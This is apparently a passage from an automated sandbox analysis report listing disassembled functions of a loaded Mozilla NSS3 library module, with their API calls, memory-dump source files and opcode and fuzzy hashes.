Part of subcall function 6CAB57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CAB5843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA9BD8C

Part of subcall function 6CACFAB0: free.MOZGLUE(?,-00000001,?,?,6CA6F673,00000000,00000000), ref: 6CACFAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6CA9BD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CA9BDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA9BE3A

Part of subcall function 6CA73E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA73EC2
Part of subcall function 6CA73E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA73ED6
Part of subcall function 6CA73E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA73EEE
Part of subcall function 6CA73E60: PR_CallOnce.NSS3(6CBD2AA4,6CAD12D0), ref: 6CA73F02
Part of subcall function 6CA73E60: PL_FreeArenaPool.NSS3 ref: 6CA73F14
Part of subcall function 6CA73E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CA73F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA9BE52

Part of subcall function 6CA72E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA72CDA,?,00000000), ref: 6CA72E1E
Part of subcall function 6CA72E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CA72E33
Part of subcall function 6CA72E00: TlsGetValue.KERNEL32 ref: 6CA72E4E
Part of subcall function 6CA72E00: EnterCriticalSection.KERNEL32(?), ref: 6CA72E5E
Part of subcall function 6CA72E00: PL_HashTableLookup.NSS3(?), ref: 6CA72E71
Part of subcall function 6CA72E00: PL_HashTableRemove.NSS3(?), ref: 6CA72E84
Part of subcall function 6CA72E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CA72E96
Part of subcall function 6CA72E00: PR_Unlock.NSS3 ref: 6CA72EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA9BE61

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: d0005bf2ba26755f8ef341aec14da8dea90bada82aa140172a9e786878219720
Instruction ID: 22e7d040ef1cb5918eabb71c18f9d9e1642664d187250ba4edb7edc731bc5518
Opcode Fuzzy Hash: d0005bf2ba26755f8ef341aec14da8dea90bada82aa140172a9e786878219720
Instruction Fuzzy Hash: 1D4107B5A102109FDB20CF28ED81A5A77F8FF44718F144268F90997711E731ED98CBA2

Function 6CAD89A0 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3 ref: 6CAD89DF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAD89EA
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAD8A04

Part of subcall function 6CADBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6CAD800A,00000000,?,00000000,?), ref: 6CADBC3F

PK11_PBEKeyGen.NSS3(00000000,?,?,00000000,?), ref: 6CAD8A47
PK11_GetInternalKeySlot.NSS3 ref: 6CAD8A7E
PK11_PBEKeyGen.NSS3(00000000,?,00000000,00000000,?), ref: 6CAD8A96

Part of subcall function 6CABF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CABF854
Part of subcall function 6CABF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CABF868
Part of subcall function 6CABF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CABF882
Part of subcall function 6CABF820: free.MOZGLUE(04C483FF,?,?), ref: 6CABF889
Part of subcall function 6CABF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CABF8A4
Part of subcall function 6CABF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CABF8AB
Part of subcall function 6CABF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CABF8C9
Part of subcall function 6CABF820: free.MOZGLUE(280F10EC,?,?), ref: 6CABF8D0

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6CAD8AD4

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$K11_Util$CriticalDeleteItem_Section$CopyInternalSlot$AlgorithmTag_Zfree
String ID:
API String ID: 3389286309-0
Opcode ID: bcaec0480434486d61ec7faf6d41811e3b7b4c7f02f2524a184bc902899c0f65
Instruction ID: 39aa57fd8c7694945a2eae1339422bab9c234b781119c42fc5b4b400fec963aa
Opcode Fuzzy Hash: bcaec0480434486d61ec7faf6d41811e3b7b4c7f02f2524a184bc902899c0f65
Instruction Fuzzy Hash: 0B41F6796003087FD7009E69DD41B6B776CEB44718F0A406AFD189BA52E732F99887E2

Function 6CABAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CABAB3E,?,?,?), ref: 6CABAC35

Part of subcall function 6CA9CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CA9CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CABAB3E,?,?,?), ref: 6CABAC55

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CABAB3E,?,?), ref: 6CABAC70

Part of subcall function 6CA9E300: TlsGetValue.KERNEL32 ref: 6CA9E33C
Part of subcall function 6CA9E300: EnterCriticalSection.KERNEL32(?), ref: 6CA9E350
Part of subcall function 6CA9E300: PR_Unlock.NSS3(?), ref: 6CA9E5BC
Part of subcall function 6CA9E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CA9E5CA
Part of subcall function 6CA9E300: TlsGetValue.KERNEL32 ref: 6CA9E5F2
Part of subcall function 6CA9E300: EnterCriticalSection.KERNEL32(?), ref: 6CA9E606
Part of subcall function 6CA9E300: PORT_Alloc_Util.NSS3(?), ref: 6CA9E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CABAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CABAB3E), ref: 6CABACD7
PORT_Alloc_Util.NSS3(?), ref: 6CABAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CABAD2B

Part of subcall function 6CA9F360: TlsGetValue.KERNEL32(00000000,?,6CABA904,?), ref: 6CA9F38B
Part of subcall function 6CA9F360: EnterCriticalSection.KERNEL32(?,?,?,6CABA904,?), ref: 6CA9F3A0
Part of subcall function 6CA9F360: PR_Unlock.NSS3(?,?,?,?,6CABA904,?), ref: 6CA9F3D3

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: a9aca97835c6254dd37377b3e8a20da8afb39b91df4939981fdc21350c113470
Instruction ID: 0f59442cd37a15f152e63b22f968bfe9afe846e59bdc361d980ad2df774c6794
Opcode Fuzzy Hash: a9aca97835c6254dd37377b3e8a20da8afb39b91df4939981fdc21350c113470
Instruction Fuzzy Hash: AD312CB1E006055FEB009F69CC415AF77BBEF85718B198128E8156B740FB31ED9987A1

Function 6CA98C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CA98C7C

Part of subcall function 6CB39DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CB80A27), ref: 6CB39DC6
Part of subcall function 6CB39DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CB80A27), ref: 6CB39DD1
Part of subcall function 6CB39DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB39DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA98CB0
TlsGetValue.KERNEL32 ref: 6CA98CD1
EnterCriticalSection.KERNEL32(?), ref: 6CA98CE5
PR_Unlock.NSS3(?), ref: 6CA98D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CA98D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA98D93

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 172cad3cec503378985d233f19f0b605a16930e39c21813fafa7b663f75007d1
Instruction ID: 254c7eb07d603740d606f16b4a4f70be519394dae80078e3e73e9d70f2aa3e7f
Opcode Fuzzy Hash: 172cad3cec503378985d233f19f0b605a16930e39c21813fafa7b663f75007d1
Instruction Fuzzy Hash: 68312871A01215AFD7009F68DC4679AB7F4FF15318F24013AEA1967B60D771A9A4C7C1

Function 6CAD9D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CAD9C5B), ref: 6CAD9D82

Part of subcall function 6CAD14C0: TlsGetValue.KERNEL32 ref: 6CAD14E0
Part of subcall function 6CAD14C0: EnterCriticalSection.KERNEL32 ref: 6CAD14F5
Part of subcall function 6CAD14C0: PR_Unlock.NSS3 ref: 6CAD150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CAD9C5B), ref: 6CAD9DA9

Part of subcall function 6CAD1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA7895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA6F599,?,00000000), ref: 6CAD136A
Part of subcall function 6CAD1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CA7895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA6F599,?,00000000), ref: 6CAD137E
Part of subcall function 6CAD1340: PL_ArenaGrow.NSS3(?,6CA6F599,?,00000000,?,6CA7895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA6F599,?), ref: 6CAD13CF
Part of subcall function 6CAD1340: PR_Unlock.NSS3(?,?,6CA7895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA6F599,?,00000000), ref: 6CAD145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CAD9C5B), ref: 6CAD9DCE

Part of subcall function 6CAD1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CA7895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA6F599,?,00000000), ref: 6CAD13F0
Part of subcall function 6CAD1340: PL_ArenaGrow.NSS3(?,6CA6F599,?,?,?,00000000,00000000,?,6CA7895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6CAD1445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6CAD9C5B), ref: 6CAD9DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CAD9C5B), ref: 6CAD9DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CAD9C5B), ref: 6CAD9E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6CAD9C5B), ref: 6CAD9E91

Part of subcall function 6CB1C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB1C2BF

Part of subcall function 6CAD1560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6CACFAAB,00000000), ref: 6CAD157E
Part of subcall function 6CAD1560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CACFAAB,00000000), ref: 6CAD1592
Part of subcall function 6CAD1560: memset.VCRUNTIME140(?,00000000,?), ref: 6CAD1600
Part of subcall function 6CAD1560: PL_ArenaRelease.NSS3(?,?), ref: 6CAD1620
Part of subcall function 6CAD1560: PR_Unlock.NSS3(?), ref: 6CAD1639

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 0f6d30dc1ccab8fe224dfe77c1316ee2d4f67d48e8f405ab582125ef790ec70e
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 574183B4501602AFE7409F65D950BA1B7B1FF45358F198128D9184BF90EF72F478CB90

Function 6CA9DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CA9DDEC

Part of subcall function 6CAD0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD08B4

PK11_DigestBegin.NSS3(00000000), ref: 6CA9DE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CA9DE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6CA9DE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CA9DEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CA9DEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA9DECC

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: a125970879003d0298e7bd955851691aa3f6c5c0714053c234a5f7a1a87fd4d2
Instruction ID: 31a8bc55005f3dc403a88741f6a6f205e486b386ea858b9d27a6abc881252cd4
Opcode Fuzzy Hash: a125970879003d0298e7bd955851691aa3f6c5c0714053c234a5f7a1a87fd4d2
Instruction Fuzzy Hash: 2F31B5B2D102146BDB00AF69AD42BBB76F89F54608F050135ED09A7742FB31D9D8C6E2

Function 6CA77E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CA77E48

Part of subcall function 6CAD0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA787ED,00000800,6CA6EF74,00000000), ref: 6CAD1000
Part of subcall function 6CAD0FF0: PR_NewLock.NSS3(?,00000800,6CA6EF74,00000000), ref: 6CAD1016
Part of subcall function 6CAD0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA787ED,00000008,?,00000800,6CA6EF74,00000000), ref: 6CAD102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6CA77E5B

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CA77E7B

Part of subcall function 6CACFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAC8D2D,?,00000000,?), ref: 6CACFB85
Part of subcall function 6CACFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CACFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CB9925C,?), ref: 6CA77E92

Part of subcall function 6CACB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBA18D0,?), ref: 6CACB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA77EA1
SECOID_FindOID_Util.NSS3(00000004), ref: 6CA77ED1
SECOID_FindOID_Util.NSS3(00000004), ref: 6CA77EFA

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 3989529743-0
Opcode ID: 4656a4db883ea88059c4d36801f48997782b1498509094919f071b4f3b8912e5
Instruction ID: 6b799c4791e8df0020cfe3da2a40c68d5f7f8f77b672e25fe4dbca15f2baf8cb
Opcode Fuzzy Hash: 4656a4db883ea88059c4d36801f48997782b1498509094919f071b4f3b8912e5
Instruction Fuzzy Hash: 8A3192BAA002115BEB218B659D40B6B73B8FF44258F1A4424DD55DBB41E730FC48C7B1

Function 6CACDC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CACD9E4,00000000), ref: 6CACDC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CACD9E4,00000000), ref: 6CACDC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CACD9E4,00000000), ref: 6CACDC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CACDC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CACDCAD

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: 0c0bffd56ab1d05d66956ad47f2ba46c5c976e671b5684af5e2138314a2bc640
Instruction ID: b0cf443358990ad0a404a8ba449e332535f93cb18aa7e8a51e5f6b52b9435f3e
Opcode Fuzzy Hash: 0c0bffd56ab1d05d66956ad47f2ba46c5c976e671b5684af5e2138314a2bc640
Instruction Fuzzy Hash: FF31AFB5A442009FD710CF6DD880B96B7F8AF04358F188429E95CCBB00E771E984CBA2

Function 6CA92E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6CA8E728,?,00000038,?,?,00000000), ref: 6CA92E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CA92E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CA92E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6CA92E8F
PL_HashTableLookup.NSS3(?,?), ref: 6CA92E9E
PR_Unlock.NSS3(?), ref: 6CA92EAB
PR_Unlock.NSS3(?), ref: 6CA92F0D

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: ef5d1843abcf04309ef9baa2ff1b1e2801075b3f405d3402cf4c4548e394d433
Instruction ID: 657b9ca3dcebd2f537ab49ac257fce9e5cc957db2e142c1eda6942f691bea028
Opcode Fuzzy Hash: ef5d1843abcf04309ef9baa2ff1b1e2801075b3f405d3402cf4c4548e394d433
Instruction Fuzzy Hash: E231F975A005059BEB01AF78EC858BABBB5FF55258B088274EC18C7B11EB31EDA4C7D1

Function 6CADCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CADCD93,?), ref: 6CADCEEE

Part of subcall function 6CAD14C0: TlsGetValue.KERNEL32 ref: 6CAD14E0
Part of subcall function 6CAD14C0: EnterCriticalSection.KERNEL32 ref: 6CAD14F5
Part of subcall function 6CAD14C0: PR_Unlock.NSS3 ref: 6CAD150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CADCD93,?), ref: 6CADCEFC

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CADCD93,?), ref: 6CADCF0B

Part of subcall function 6CAD0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CAD08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CADCD93,?), ref: 6CADCF1D

Part of subcall function 6CACFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAC8D2D,?,00000000,?), ref: 6CACFB85
Part of subcall function 6CACFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CACFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CADCD93,?), ref: 6CADCF47
